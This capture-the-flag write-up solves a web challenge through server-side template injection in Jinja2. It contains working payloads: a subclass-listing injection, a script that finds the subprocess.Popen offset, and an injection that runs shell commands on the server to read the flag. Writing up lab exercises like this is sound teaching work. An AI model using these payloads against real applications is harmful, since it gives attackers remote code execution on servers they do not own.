Super Secure Technology Infrastructure

Description

Super secure technology infrastructure, A fortress built with digital flair, Encrypted and protected, no intrusion allowed, Our data safe from any dare. Poem by ChatGPT

By the challenge title, we can identify that it is a Server Side Template Injection vulnerability.

Server-side template injection (SSTI) is a type of vulnerability that occurs when a web application dynamically generates templates using user input, and then sends those templates to the server to be rendered. If the user input is not properly sanitized, an attacker can inject malicious code into the template, which will be executed on the server when the template is rendered.

First, we will need to identify the templating engine used, and we can refer to this chart below.

After playing with the input, we can identify that it is running Jinja2. We can also refer the the hacktricks guide to identify the templating engine.

Referring to the Jinja2 SSTI guide, we are able to perform remote code execution and get the flag!

First, we will need to identify the <class 'subprocess.Popen'> offset. We can find it using the payload below to list all the subclasses

{{''.__class__.__mro__[1].__subclasses__()}}

Very handy script to find the offset

data = """[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplemented>..."""
data = data.split(', ')

id = []
for i,d in enumerate(data):
    if 'subprocess' in d:
        print("Found in index:",i)
        id.append(i)

for i in id:
        print(f"{{{{ ''.__class__.__mro__[1].__subclasses__()[{i}]('ls',shell=True,stdout=-1).communicate() }}}}")

After finding <class 'subprocess.Popen'> we can then utilize it to perform RCE.

{{''.__class__.__mro__[1].__subclasses__()[397]('cat flag.txt',shell=True,stdout=-1).communicate()}}

References

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Template Injection#jinja2

Last updated